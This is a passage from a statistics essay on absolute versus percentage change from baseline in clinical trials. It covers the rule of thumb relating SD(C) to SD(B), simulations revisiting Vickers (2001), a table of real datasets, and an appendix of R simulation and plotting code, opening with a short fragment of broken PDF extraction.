SD (B) = 1.\nTherefore, when r\n0:75, the\np empirical form of the rule\nof thumb SD (C)\nSD (B)\n2 holds. If the correlation\ncoe¢ cient r changes to another value, the form of the rule\nof thumb will be also changed. 
### 3.2 The Relation between the Standard Deviation of Absolute Change and the Correlation Coefficient

The empirical form of the rule of thumb is expression (7); setting $k = 1/\sqrt{2 - 2r} = \sqrt{2}$ gives $r = 0.75$. Equation (12) relates the standard deviation of the absolute change to that of the baseline scores, so how does $SD(C)$ depend on the correlation coefficient? If we assume that $SD(B) = 1$, then $SD(C) = \sqrt{2 - 2r}$. The smooth curve in Figure 1 shows this relationship: $SD(C)$ decreases from about 1.4 to 0 as the correlation coefficient increases from 0 to 1. For $r \le 0.8$ the decrease is roughly linear; after that, as $r$ tends to 1, $SD(C)$ drops quickly to 0.

[Figure 1. Relation curve between the standard deviation of absolute change $SD(C)$ and the correlation coefficient $r$ when $SD(B) = 1$; the marked point is $(0.75, \sqrt{2}/2)$.]

Therefore, when $r \approx 0.75$, the empirical form $SD(C) \approx SD(B)/\sqrt{2}$ of the rule of thumb holds. If the correlation coefficient takes another value, the form of the rule of thumb changes accordingly, and when $r$ is close to 1, a small change in $r$ may result in a significant change in the standard deviation of absolute change.

### 3.3 Rule of Thumb for Percentage Change

Earlier we stated that $P = (B - F)/B = C/B$, i.e. percentage change is the ratio of absolute change to the baseline score. Then we get

$$SD(P) = SD\!\left(\frac{B - F}{B}\right) = SD\!\left(\frac{C}{B}\right).$$

Since percentage change is a ratio of two variables, its distribution is uncertain, and it is hard to derive an expression for its standard deviation from the standard deviation of the baseline scores as we did in equation (10). Having discussed the rule of thumb for $SD(C)$, we see that the standard deviation of percentage change depends not only on the absolute change $C$ but also on the baseline score $B$; even if the value of $C$ is fixed, $B$ keeps changing from one sample to another. As a result, there seems to be no stable relationship between the standard deviation of percentage change $SD(P)$ and the baseline scores, and a rule of thumb for percentage change can, therefore, not be stated.
This conclusion will be proved in the following simulation part.

4. Simulation

In section 2, we discussed the comparison of the statistical power of absolute change and percentage change by constructing a ratio test statistic based on a normal distribution assumption. In the third section, we discussed the rule of thumb for absolute change and percentage change theoretically. This section will do some simulations to show the problems that we have discussed in a practical way. The first thing we want to prove is, in contrast with Vickers' (2001) conclusion, that percentage change can be statistically efficient under some conditions. The second thing that will be proved is the difficulty of defining a rule of thumb for percentage change.

In the following subsections, we will do simulations based on Vickers' (2001) method, but some changes and improvements will be made to his code.

4.1 Statistical Efficiency of Percentage Change under Some Conditions

Vickers (2001) suggested avoiding the use of percentage change, because of his conclusion that percentage change from baseline is statistically inefficient. He made that conclusion based on the comparison of statistical power calculated from his simulation results.

Vickers (2001) did the simulation in the following way. First, he simulated 100 pairs of baseline and follow-up scores for 100 patients. The baseline scores B are simulated from a normal distribution, i.e. B ~ N(50, 10). In order to get the 100 scores B, he simulated 100 values B' first, B' ~ N(0, 10), and then obtained B from the equation B = B' + 50. He also simulated another 100 scores Y, Y ~ N(0, 10), which are defined as the post-treatment scores of the control group. Then the follow-up scores F' are simulated from B' and Y by using equation (13). We should note that F' is not the final follow-up score.

F' = B' * r + Y * sqrt(1 - r^2) + 50        (13)

From B' ~ N(0, 10) and Y ~ N(0, 10), we obtain that F' ~ N(50, 10). Finally, Vickers (2001) simulated 100 values g from Binomial(1, 0.5), one for each patient. The patients who got g = 1 were put into the treatment group, and the other patients were put into the control group, so there are nearly 50 patients in both the treatment group and the control group. For the patients in the treatment group, the final follow-up scores F all have an absolute decrease of 5 units from F' after the medical intervention, while there is no change of the follow-up scores for patients in the control group, i.e.

F = F' - 5   if g = 1
F = F'       if g = 0

He changed the correlation coefficient r and got different simulation results under different correlation coefficients. Using these simulation results, he calculated the statistical power for each method and made the statistical inefficiency conclusion.

4.1.1 A Case where Percentage Change Has Higher Statistical Power

In Vickers' (2001) simulation method, a fixed absolute change from the simulated follow-up scores F' to the final follow-up scores F was set for each patient in the treatment group. If we change the fixed absolute change to a fixed percentage change, maybe we will get something different. To be more randomized, just like what may happen in practice, we use a random percentage change instead of a fixed percentage change. The percentage changes P are simulated from a normal distribution. We should notice that the changes we made to Vickers' (2001) simulation will result in a change of the correlation coefficient between the baseline and follow-up scores: the correlation coefficient of the baseline and follow-up scores in the simulation result is no longer the r that we used in equation (13), even though the real value of the correlation coefficient may be very close to the value we used in the simulation. However, since the correlation coefficient will not affect the comparison of the statistical power of the two methods, we will give the value of r used in each simulation procedure but not discuss it further. What's more, in the following simulations we concentrate only on the patients in the treatment group.

We have developed a ratio test statistic R in section 2, and we will use it to do the comparison between absolute change and percentage change. The simulation can be divided into two steps. In step 1, we simulate 100 pairs of baseline/follow-up scores. In the second step, the test statistic R is calculated based on the scores we simulated in step 1. Since the test statistic R is the ratio of two expected values, in order to estimate the expected values we repeat the score simulation procedure of step 1 100 times, obtaining 100 datasets of scores; in the second step, using the 100 datasets, we work out the value of R and check whether it is less than 1.

From equation (5), we know that, in order to simulate a dataset such that R < 1, we should let the percentage change have a large mean and a small standard deviation. So, in this case, we simulate P from the normal distribution N(0.5, 0.01). We set r = 0.75 and simulate B from the distribution N(200, 20). According to Vickers' (2001) simulation method, we obtain a dataset of scores. Figure 2 shows a part of the simulation results of the baseline and follow-up scores from step 1; we see that there is a nearly 50% decrease from the baseline score for each patient.

[Figure 2. Change from Baseline Scores to Follow-up Scores (r = 0.75); B ~ N(200, 20), P ~ N(0.5, 0.01).]
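The two-step procedure is short enough to restate outside R. The following Python sketch is an illustration consistent with the text, not the authors' code; their R program is reproduced in the appendix:

import numpy as np

rng = np.random.default_rng(12345)
n, r = 100, 0.75

def estimate_R(sd_p=0.01, reps=100):
    # Step 2: estimate R = E|t_C| / E|t_P| from `reps` datasets generated in step 1.
    t_c, t_p = [], []
    for _ in range(reps):
        # Step 1: one dataset of treatment-group baseline/follow-up scores.
        b0 = rng.normal(0, 20, n)
        y  = rng.normal(0, 20, n)
        f  = b0 * r + y * np.sqrt(1 - r**2) + 200   # equation (13), shifted to mean 200
        b  = b0 + 200
        f  = f * (1 - rng.normal(0.5, sd_p, n))     # random percentage change P ~ N(0.5, sd_p)
        c, p = b - f, (b - f) / b
        t_c.append(abs(c.mean() / c.std(ddof=1)))
        t_p.append(abs(p.mean() / p.std(ddof=1)))
    return np.mean(t_c) / np.mean(t_p)

print(estimate_R())   # well below 1: percentage change has the higher statistical power here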
In order to show a more general result, we repeat the procedure of both step 1 and step 2 100 times and check the distribution of R. As shown in Figure 3, the solid line on the left is the distribution of R based on the datasets we simulated. We see that, when P ~ N(0.5, 0.01), the value of R is much less than 1. As a result, in this case, percentage change has the higher statistical power.

In this simulation, we set the percentage change P normally distributed with a large mean and a small standard deviation. However, it is unreasonable to have such a small standard deviation in practice. If we increase the standard deviation of P, what kind of result will come to us?

Figure 3 shows the distribution of R under different standard deviations of P. We see that the value of the test statistic R increases as the standard deviation of P increases. Although R increases, it is still less than 1. In this case, we prefer percentage change to absolute change.

[Figure 3. Distribution of R (r = 0.75); B ~ N(200, 20), P ~ N(0.5, SD(P)) for SD(P) = 0.01, 0.05, 0.1, 0.2.]

4.1.2 A Case where Absolute Change Has a Little Higher Statistical Power

In the last section, we simulated a case where percentage change had a higher statistical power, which is in contrast with Vickers' (2001) conclusion. If we think more about the simulation method, we should notice that we used a percentage change to do the simulation in that case. It may be a factor which affects the simulation results in favor of percentage change having the higher statistical power.

Now, we just change P ~ N(0.5, 0.01) to C ~ N(100, 5) and keep the other conditions the same. Part of the baseline and follow-up scores are shown in Figure 4. It seems similar to the scores in Figure 2. This is because we set the expected absolute change to 100, which is 50% of the baseline scores. So, in a similar absolute-change case, what kind of result will we get?

[Figure 4. Change from Baseline Scores to Follow-up Scores (r = 0.75); B ~ N(200, 20), C ~ N(100, 5).]

Figure 5 shows the distribution of R under different standard deviations of C. Comparing with the distributions in Figure 3, we find it changes in a different way when the standard deviation of C changes: the distributions in Figure 3 mainly show a location difference, while the distributions in Figure 5 have different kurtosis and spread.

[Figure 5. Distribution of R (r = 0.75); B ~ N(200, 20), C ~ N(100, SD(C)) for SD(C) = 5, 10, 20, 40.]

Even though the expected value of R in Figure 5 is larger than 1, it is really close to 1. In this case, it seems both absolute change and percentage change can be used; the difference between the statistical powers of the two methods is very small.

4.1.3 Another Case where Percentage Change Has Little Difference from Absolute Change

In this case, we reduce the standard deviation of the baseline scores to 10 and compare the results with those of the previous case. From Figure 6, we find that the expected value of the ratio test statistic is much closer to 1. If we also reduce the mean of C, then R is completely less than 1. This is another case that shows that, under some conditions, the statistical powers of the two methods are nearly the same.

[Figure 6. Distribution of R (r = 0.75); B ~ N(200, SD(B)), C ~ N(Mean(C), 10) for (SD(B), Mean(C)) = (20, 100), (10, 100), (10, 50).]

We have done three simulations based on a modification of Vickers' (2001) method so far. The first one shows that percentage change can have higher statistical power. The other two show that percentage change can have nearly the same statistical power as absolute change. All of them prove that percentage change can be statistically efficient under some conditions. Therefore, Vickers' (2001) conclusion is not correct.

4.2 Nonexistence of a Rule of Thumb for Percentage Change

We have discussed the rule of thumb for percentage change theoretically in section 3. In this section we will simulate another dataset to check whether a rule of thumb for percentage change exists. The simulation will show how the standard deviation of percentage change SD(P) depends on the baseline scores B.

This simulation is also based on Vickers' (2001) simulation method. In this case, the baseline scores follow B ~ N(50, 10), and the percentage change has the distribution P ~ N(0.1, 0.02). Following the simulation steps, we get a score dataset, and the standard deviations of absolute change and percentage change can be calculated.

After we get the baseline and follow-up scores, we make a simple transformation in which both the baseline and follow-up scores decrease by 5 units, i.e.

B~ = B - 5
F~ = F - 5

After the transformation, we get a new dataset of baseline and follow-up scores and calculate the standard deviations of the absolute change and percentage change of the new scores. We repeat the simulation procedure 100 times; each time we get 4 standard deviations, SD(C), SD(C~), SD(P), SD(P~). Then we calculate the mean of the 100 simulation results for each of the 4 standard deviations. When the correlation coefficient changes, we get the relation curve between the standard deviation of the change scores and the correlation coefficient, both before and after the transformation.

From Figure 7, we observe that, after the transformation, the standard deviation of absolute change does not change. Actually, we can prove that in a theoretical way:

C~ = B~ - F~ = (B - 5) - (F - 5) = B - F = C

After the transformation, C does not change. Therefore, the standard deviation of absolute change does not change either.

From Figure 7, we also see that the standard deviations of percentage change under different correlation coefficients become larger after the transformation. The smaller the correlation coefficient is, the larger the change of the standard deviation of percentage change will be.

We have mentioned that SD(P) = SD(C/B). In this case, C does not change, but B becomes smaller. As a result, the standard deviation of percentage change becomes larger. This reflects that the standard deviation of percentage change depends on the baseline scores. Therefore, it is difficult to state a rule of thumb for the standard deviation of percentage change based only on the standard deviation of the baseline scores.

[Figure 7. Relation curves between the standard deviation of absolute change (above) or percentage change (below) and the correlation coefficient r, before and after the transformation; B ~ N(50, 10), P ~ N(0.1, 0.02).]
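The effect of the transformation is also easy to see numerically. Again, this is a Python illustration added here, not part of the paper's appendix:

import numpy as np

rng = np.random.default_rng(1)
n, r = 100_000, 0.6
b0, y = rng.normal(0, 10, n), rng.normal(0, 10, n)
b = b0 + 50
f = (b0 * r + y * np.sqrt(1 - r**2) + 50) * (1 - rng.normal(0.1, 0.02, n))

for shift in (0, 5):                      # shift = 5 gives B~ = B - 5, F~ = F - 5
    bt, ft = b - shift, f - shift
    c, p = bt - ft, (bt - ft) / bt
    print(shift, round(c.std(ddof=1), 3), round(p.std(ddof=1), 4))
# SD(C) is identical in both rows; SD(P) is larger after the shift.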
5. Demonstration of the Rule of Thumb for Absolute Change

We have discussed the rule of thumb for absolute change theoretically in the third section of this essay. A general expression of the rule of thumb is given in equation (12). We know that, when r is approximately 0.75, the empirical form of the rule of thumb in expression (7) holds. In this section, we concentrate on the demonstration of the rule of thumb for absolute change: we collect some real datasets to check whether the rule of thumb works well.

The real datasets are taken from examples in clinical research articles and the medical literature. As shown in Table 2, we have collected two kinds of datasets. The datasets of the first 10 cases contain the scores for each patient, while the datasets of the last 5 cases contain only a data summary (e.g. mean, standard deviation) of the baseline scores and absolute change scores. If we know the scores for each patient, we can calculate not only the standard deviations but also the correlation coefficient between the baseline scores and the follow-up scores. So, for the first 10 cases, we also get the value for the general form of the rule of thumb.

Table 2. Comparison of the real standard deviation SD(C) and the values obtained from the rule of thumb for absolute change.

Case  | SD(B) | SD(F) | SD(C) | SD(B)/sqrt(2) | sqrt(2-2r)*SD(B) |  r   |  m
1 [5]  | 11.43 |  8.43 |  8.99 |  8.09         |  9.86            | 0.63 | 0.54
2 [6]  | 12.29 |  6.94 |  7.91 |  8.69         |  7.76            | 0.80 | 0.32
3 [7]  |  5.59 |  5.14 |  2.54 |  3.95         |  2.61            | 0.89 | 0.84
4 [8]  |  4.79 |  4.86 |  2.68 |  3.39         |  2.66            | 0.85 | 1.03
5 [9]  |  6.32 | 13.32 | 13.76 |  4.47         |  8.15            | 0.17 | 4.45
6 [10] | 20.57 | 20.00 |  9.03 | 14.54         |  9.14            | 0.90 | 0.95
7 [11] | 13.19 | 19.02 | 17.26 |  9.33         | 13.54            | 0.47 | 2.08
8 [12] | 15.61 | 18.30 |  7.98 | 11.04         |  6.94            | 0.90 | 1.37
9 [13] | 21.85 | 24.13 | 27.05 | 15.45         | 25.65            | 0.31 | 1.22
10 [14] |  4.27 |  4.39 |  3.78 |  3.02         |  3.72            | 0.62 | 1.06
11 [15] |  0.93 |   -   |  0.37 |  0.66         |   -              |  -   |  -
12 [16] | 12.50 |   -   |  3.80 |  8.84         |   -              |  -   |  -
13 [17] | 18.30 |   -   |  6.30 | 12.94         |   -              |  -   |  -
14 [18] | 18.00 |   -   | 10.00 | 12.73         |   -              |  -   |  -
15 [19] | 16.00 |   -   | 15.00 | 11.31         |   -              |  -   |  -

Comparing the values of SD(C) and SD(B)/sqrt(2), there are obvious differences between the two values for these real datasets. In some cases, the difference between SD(C) and SD(B)/sqrt(2) is very large.

For the cases that have a correlation coefficient between 0.6 and 0.9, which is close to 0.75, the difference between SD(C) and SD(B)/sqrt(2) may be acceptable. For example, in case 1, r = 0.63, which is close to 0.75; in this case SD(C) = 8.99 and SD(B)/sqrt(2) = 8.09, and the two values are reasonably close to each other. However, in case 5, where r = 0.17, the value of SD(C) is nearly three times the value of SD(B)/sqrt(2). This is not acceptable. These facts show that the rule of thumb in expression (7) is valid when r is approximately 0.75 or when r is close to that value.

If we take the correlation coefficient r into account, by comparing the values of SD(C) and sqrt(2-2r)*SD(B), we find that the values of sqrt(2-2r)*SD(B) are closer to SD(C) than SD(B)/sqrt(2) is, especially when m is close to 1. Look at case 4, where m = 1.03: in this case SD(C) = 2.68 and sqrt(2-2r)*SD(B) = 2.66, and the two values are nearly the same, which reflects that the rule of thumb is also affected by the ratio m = Var(F)/Var(B). If we also take m into account, we get the real value of the standard deviation of absolute change; actually, we have proved that in equation (11) of section 3.

When we know nothing about the correlation between the baseline and follow-up scores, as for the last five cases in Table 2, the rule of thumb may not be suitable. In this case, we should be more careful.

From the analysis based on real datasets in this section, we learned that when the ratio m = Var(F)/Var(B) tends to 1 and the correlation coefficient is nearly 0.75, the rule of thumb SD(C) ~ SD(B)/sqrt(2) is practical. If these conditions are not satisfied, it is not a good rule to follow. If we ignore the two conditions and insist on using the rule, as we can see from Table 2, it may result in a big mistake.
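As a worked reading of Table 2 (this check is added here and is not part of the paper): for case 4, r = 0.85 and SD(B) = 4.79, so sqrt(2 - 2r)*SD(B) = sqrt(0.30) * 4.79, which is about 2.62, close to the tabulated 2.66 (the small gap comes from r being rounded to two decimals) and to the observed SD(C) = 2.68, while the cruder SD(B)/sqrt(2) = 3.39 overshoots.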
Data sources for Table 2:

[5] [6] Altman, D. G. (1991): Practical Statistics for Medical Research. London: Chapman and Hall. Page 475.
[7] [8] Pagano, M. and Gauvreau, K. (2000): Principles of Biostatistics, Second Edition. Duxbury. Table B.15.
[9] Bradstreet, T. E. (1994): "Favorite Data Sets from Early Phases of Drug Research - Part 3." Proceedings of the Section on Statistical Education of the American Statistical Association. <http://www.math.iup.edu/~tshort/Bradstreet/part3/part3-table3.html> (accessed 2009-06-08).
[10] Hand, D. J., Daly, F., Lunn, A. D., McConway, K. J. and Ostrowski, E. (1994): A Handbook of Small Data Sets. London: Chapman and Hall. Dataset 72.
[11] Ryan, Joiner and Cryer (1985): Minitab Handbook, Second Edition. PWS-KENT Publishing Company. Page 318, Pulse Data.
[12] [13] [14] Bonate, P. (2000): Analysis of Pretest-Posttest Design. Boca Raton: Chapman and Hall/CRC. Tables 3.1, 3.4 and 9.1.
[15] Waleekhachonloet, O., Limwattananon, C., Limwattananon, S. and Gross, C. (2007): Group behavior therapy versus individual behavior therapy for healthy dieting and weight control management in overweight and obese women living in rural community. Obesity Research & Clinical Practice, 1: 223-232. Table 3.
[16] [17] [18] [19] Neovius, M. and Rössner, S. (2007): Results from a randomized controlled trial comparing two low-calorie diet formulae. Obesity Research & Clinical Practice, 1: 165-171. Tables 1 and 2.

6. Discussion and Conclusions

In this essay we compared the use of absolute change and percentage change. According to the definition of statistical power, we developed a ratio test statistic R under a certain distribution assumption, which can help us decide which method should be used, absolute change or percentage change. When R > 1, absolute change has the higher statistical power; in that case, we prefer absolute change to percentage change. If R < 1, we choose percentage change.

Based on Vickers' (2001) simulation method, and with the help of the ratio test statistic, we did some simulations to compare the statistical power of the two methods. In contrast with Vickers' (2001) conclusion that percentage change is statistically inefficient, we simulated some datasets in which percentage change has higher statistical power, or nearly the same statistical power as absolute change. In this way, we showed that percentage change can be statistically efficient under some conditions.

Another issue that often concerns researchers is the standard deviation of the change scores. There is a rule of thumb that may help us get the standard deviation of the change scores quickly from the standard deviation of the baseline scores. The general form of the rule of thumb for absolute change can be derived in a theoretical way. From the derivation in section 3, we know that, when the ratio m = Var(F)/Var(B) is close to 1 and r is approximately 0.75, the empirical form of the rule of thumb SD(C) ~ SD(B)/sqrt(2) holds. We also checked these conditions in a practical way by collecting some real data to compare the real value with the value obtained from the rule of thumb, and we reached the same conclusion. So, if we know nothing about the correlation between baseline and follow-up scores, we should be careful about using the rule.

For percentage change, a rule of thumb does not exist. That is because the standard deviation of percentage change depends on the baseline scores, and it is very hazardous to state a rule. We also proved this by doing a simulation with a simple transformation. The simulation result showed how the standard deviation of percentage change depends on the baseline scores.

In this essay, we did not give any rule for making a choice between absolute change and percentage change. We developed a ratio test statistic which may be helpful, but it is not a good rule to tell us how to make a choice. That is because the ratio test statistic uses expected values, and for a specific dataset in practice we cannot calculate the expected values. That is the limitation of the test statistic.

Actually, there is no single optimal method to tell us which method to choose. From a statistical point of view, we would like to choose the method with the higher statistical power. Besides the two change measurement methods from baseline, there are also some other methods. One of them is analysis of covariance, which is mentioned by both Vickers (2001) and Kaiser (1989); Bonate (2000) discussed this method in more detail. It has higher statistical power than the two methods we talked about, but for people who are not statisticians, this method cannot be understood as easily as absolute change or percentage change.

From a clinical point of view, clinicians may prefer to choose the method that shows the health improvement more obviously. Some researchers may choose the method that can be understood by most people interested in their research. Sometimes we may make a choice just based on some empirical information. Most of the time, the choice depends on the research work and the researcher's own experience.

References

Bonate, P. (2000): Analysis of Pretest-Posttest Design. Boca Raton: Chapman and Hall/CRC.

Kaiser, L. (1989): Adjusting for baseline: change or percentage change? Statistics in Medicine, 10: 1183-1190.

Kim, M. et al. (2009): Comparison of epicardial, abdominal and regional fat compartments in response to weight loss. Nutr Metab Cardiovasc Dis, 1:7. doi: 10.1016/j.numecd.2009.01.010.

Lavange, L., Engels, J. and Accurso, F. (2007): Analyzing percent change in cystic fibrosis clinical trials. The 21st Annual North American Cystic Fibrosis Conference, Anaheim, California.

Neovius, M. and Rössner, S. (2007): Results from a randomized controlled trial comparing two low-calorie diet formulae. Obesity Research & Clinical Practice, 1: 165-171.

Törnqvist, L., Vartia, P. and Vartia, Y. (1985): How should relative changes be measured? American Statistician, 39: 43-46.

Vickers, A. (2001): The use of percentage change from baseline as an outcome in a controlled trial is statistically inefficient: a simulation study. BMC Medical Research Methodology, 1:6.

Waleekhachonloet, O., Limwattananon, C., Limwattananon, S. and Gross, C. (2007): Group behavior therapy versus individual behavior therapy for healthy dieting and weight control management in overweight and obese women living in rural community. Obesity Research & Clinical Practice, 1: 223-232.

Wilcoxon, F. (1945): Individual comparisons by ranking methods. Biometrics Bulletin, 1: 80.

Appendix: R Code (responsible programmer: Ling Zhang)

Figure 1

r <- SDC <- NULL
for (i in 1:501) {
  r[i]   <- 0.002 * (i - 1)
  SDC[i] <- sqrt(2 * (1 - r[i]))
}
plot(r, SDC, xlab = "Correlation Coefficient r", ylab = "SD(C)", type = "l")
points(0.75, sqrt(2 * (1 - 0.75)), pch = 20, col = 2)
legend(0.1, 0.7, "(0.75,sqrt(2)/2)", pch = 20, col = 2, bty = "n")

Figure 2

rm(list = ls())
set.seed(12345)
n  <- 15
mu <- 0
sd <- 20
b <- rnorm(n, mu, sd)
y <- rnorm(n, mu, sd)
r <- 0.75                        # correlation coefficient
f <- b * r + y * (1 - r^2)^0.5 + 200
h <- rnorm(n, 0.5, 0.01)         # percentage change
f <- f - (f * h)
f <- round(f)                    # follow-up score
b <- round(b) + 200              # baseline score
fun <- function(b, f) {
  l <- list(b, f)
  stripchart(l, vertical = T, group.names = c("Baseline", "Follow-up"),
             xlim = c(0.7, 2.3), pch = 20, method = "stack",
             main = "Change from Baseline to Follow-up")
  for (i in (1:length(b))) {
    lines(c(1, 2), c(b[i], f[i]), lty = 3, col = 4)
  }
  mtext(side = 1, line = 3, "B~N(200,20), P~N(0.5,0.01)")
}
fun(b, f)
Figure 3

rm(list = ls())
set.seed(12345)
n  <- 100
mu <- 0
sd <- 20
R  <- NULL
mc <- mp <- sdc <- sdp <- atc <- atp <- NULL
for (s in c(0.01, 0.05, 0.1, 0.2)) {
  for (k in 1:100) {
    for (j in 1:100) {
      b <- rnorm(n, mu, sd)
      y <- rnorm(n, mu, sd)
      r <- 0.75                  # correlation coefficient
      f <- b * r + y * (1 - r^2)^0.5 + 200
      h <- rnorm(n, 0.5, s)      # percentage change
      f <- f - (f * h)
      f <- round(f)              # follow-up score
      b <- round(b) + 200        # baseline score
      c <- b - f
      p <- (b - f) / b
      mc  <- mean(c)
      mp  <- mean(p)
      sdc <- sd(c)               # R resolves sd() to the function even though sd is also a variable
      sdp <- sd(p)
      atc[j] <- abs(mc / sdc)    # absolute value of t_C, i.e. |t_C|
      atp[j] <- abs(mp / sdp)    # absolute value of t_P, i.e. |t_P|
    }
    atc  <- na.omit(atc)
    atp  <- na.omit(atp)
    eatc <- mean(atc)            # expected value of |t_C|
    eatp <- mean(atp)            # expected value of |t_P|
    R[k] <- eatc / eatp          # value of the ratio test statistic R
  }
  if (s <= 0.01) {
    plot(density(R), xlim = c(0.51, 1), ylim = c(0, 210),
         xlab = "B~N(200,20), P~N(0.5,SD(P))", ylab = "Density",
         main = "Distribution of R")
  } else if (s <= 0.05) {
    lines(density(R), col = 2, lty = 2)
  } else if (s <= 0.1) {
    lines(density(R), col = 3, lty = 3)
  } else {
    lines(density(R), col = 4, lty = 4)
  }
}
legend(0.6, 200, c("SD(P)=0.01", "SD(P)=0.05", "SD(P)=0.1", "SD(P)=0.2"),
       lty = c(1, 2, 3, 4), col = c(1, 2, 3, 4), bty = "n")

Figure 4

rm(list = ls())
set.seed(12345)
n  <- 15
mu <- 0
sd <- 20
b <- rnorm(n, mu, sd)
y <- rnorm(n, mu, sd)
r <- 0.75                        # correlation coefficient
f <- b * r + y * (1 - r^2)^0.5 + 200
h <- rnorm(n, 100, 5)            # absolute change
f <- f - h
f <- round(f)                    # follow-up score
b <- round(b) + 200              # baseline score
fun <- function(b, f) {
  l <- list(b, f)
  stripchart(l, vertical = T, group.names = c("Baseline", "Follow-up"),
             xlim = c(0.7, 2.3), pch = 20, method = "stack",
             main = "Change from Baseline to Follow-up")
  for (i in (1:length(b))) {
    lines(c(1, 2), c(b[i], f[i]), lty = 3, col = 4)
  }
  mtext(side = 1, line = 3, "B~N(200,20), C~N(100,5)")
}
fun(b, f)

Figure 5

rm(list = ls())
set.seed(12345)
n  <- 100
mu <- 0
sd <- 20
R  <- NULL
mc <- mp <- sdc <- sdp <- atc <- atp <- NULL
for (s in c(5, 10, 20, 40)) {
  for (k in 1:100) {
    for (j in 1:100) {
      b <- rnorm(n, mu, sd)
      y <- rnorm(n, mu, sd)
      r <- 0.75                  # correlation coefficient
      f <- b * r + y * (1 - r^2)^0.5 + 200
      h <- rnorm(n, 100, s)      # absolute change
      f <- f - h
      f <- round(f)              # follow-up score
      b <- round(b) + 200        # baseline score
      c <- b - f
      p <- (b - f) / b
      mc  <- mean(c)
      mp  <- mean(p)
      sdc <- sd(c)
      sdp <- sd(p)
      atc[j] <- abs(mc / sdc)    # |t_C|
      atp[j] <- abs(mp / sdp)    # |t_P|
    }
    atc  <- na.omit(atc)
    atp  <- na.omit(atp)
    eatc <- mean(atc)            # expected value of |t_C|
    eatp <- mean(atp)            # expected value of |t_P|
    R[k] <- eatc / eatp          # ratio test statistic R
  }
  if (s <= 5) {
    plot(density(R), xlim = c(0.99, 1.04), ylim = c(0, 180),
         xlab = "B~N(200,20), C~N(100,SD(C))", ylab = "Density",
         main = "Distribution of R")
  } else if (s <= 10) {
    lines(density(R), col = 2, lty = 2)
  } else if (s <= 20) {
    lines(density(R), col = 3, lty = 3)
  } else {
    lines(density(R), col = 4, lty = 4)
  }
}
legend(1.02, 150, c("SD(C)=5", "SD(C)=10", "SD(C)=20", "SD(C)=40"),
       lty = c(1, 2, 3, 4), col = c(1, 2, 3, 4), bty = "n")

Figure 6

rm(list = ls())
set.seed(12345)
n  <- 100
mu <- 0
R  <- NULL
mc <- mp <- sdc <- sdp <- atc <- atp <- NULL
for (sd in c(20, 10)) {
  for (muc in c(100, 50)) {
    for (k in 1:100) {
      for (j in 1:100) {
        b <- rnorm(n, mu, sd)
        y <- rnorm(n, mu, sd)
        r <- 0.75                # correlation coefficient
        f <- b * r + y * (1 - r^2)^0.5 + 200
        h <- rnorm(n, muc, 10)   # absolute change
        f <- f - h
        f <- round(f)            # follow-up score
        b <- round(b) + 200      # baseline score
        c <- b - f
        p <- (b - f) / b
        mc  <- mean(c)
        mp  <- mean(p)
        sdc <- sd(c)
        sdp <- sd(p)
        atc[j] <- abs(mc / sdc)  # |t_C|
        atp[j] <- abs(mp / sdp)  # |t_P|
      }
      atc  <- na.omit(atc)
      atp  <- na.omit(atp)
      eatc <- mean(atc)          # expected value of |t_C|
      eatp <- mean(atp)          # expected value of |t_P|
      R[k] <- eatc / eatp        # ratio test statistic R
    }
    if (sd >= 20 & muc >= 100) {
      plot(density(R), xlim = c(0.975, 1.03), ylim = c(0, 210),
           xlab = "B~N(200,SD(B)), C~N(Mean(C),10)", ylab = "Density",
           main = "Distribution of R")
    } else if (sd >= 10 & muc >= 100) {
      lines(density(R), col = 2, lty = 2)
    } else if (sd <= 10) {
      lines(density(R), col = 4, lty = 3)
    }                            # the (SD(B)=20, Mean(C)=50) combination is not plotted
  }
}
legend(0.99, 200, c("SD(B)=20,Mean(C)=100", "SD(B)=10,Mean(C)=100", "SD(B)=10,Mean(C)=50"),
       lty = c(1, 2, 3), col = c(1, 2, 4), bty = "n")

Figure 7

rm(list = ls())
par(mfrow = c(1, 2), pty = "s")
n  <- 100
mu <- 0
sd <- 10
SDC <- SDC2 <- SDP <- SDP2 <- matrix(0, 100, 21)
for (j in 1:100) {
  b <- rnorm(n, mu, sd)
  y <- rnorm(n, mu, sd)
  r <- NULL
  bb <- b
  for (i in 1:21) {
    r[i] <- 0.05 * (i - 1)       # correlation coefficient
    f <- b * r[i] + y * (1 - r[i]^2)^0.5 + 50
    h <- rnorm(n, 0.1, 0.02)     # percentage change
    f <- f - (f * h)
    f <- round(f)                # follow-up score before transformation
    f2 <- f - 5                  # follow-up score after transformation
    b <- round(b) + 50           # baseline score before transformation
    b2 <- b - 5                  # baseline score after transformation
    c  <- b - f
    c2 <- b2 - f2
    p  <- c / b
    p2 <- c2 / b2
    SDC[j, i]  <- sd(c)
    SDC2[j, i] <- sd(c2)
    SDP[j, i]  <- sd(p)
    SDP2[j, i] <- sd(p2)
    b <- bb                      # restore the raw baseline draws for the next value of r
  }
}
MSDC <- MSDC2 <- MSDP <- MSDP2 <- NULL
for (i in 1:21) { MSDC[i]  <- mean(SDC[, i]) }
for (i in 1:21) { MSDC2[i] <- mean(SDC2[, i]) }
plot(r, MSDC, type = "l", xlab = "Correlation Coefficient r", ylab = "SD(C)")
lines(r, MSDC2, type = "l", lty = 2, col = 2)
legend(0, 7, c("Before Transformation", "After Transformation"),
       lty = c(1, 2), col = c(1, 2), bty = "n")
mtext(side = 1, line = 4, "B~N(50,10), P~N(0.1,0.02)")
for (i in 1:21) { MSDP[i]  <- mean(SDP[, i]) }
for (i in 1:21) { MSDP2[i] <- mean(SDP2[, i]) }
plot(r, MSDP, type = "l", xlab = "Correlation Coefficient r", ylab = "SD(P)")
lines(r, MSDP2, type = "l", lty = 2, col = 2)
legend(0, 0.15, c("Before Transformation", "After Transformation"),
       lty = c(1, 2), col = c(1, 2), bty = "n")
mtext(side = 1, line = 4, "B~N(50,10), P~N(0.1,0.02)")
```
https://aiforevery1.com/lambdafunction/
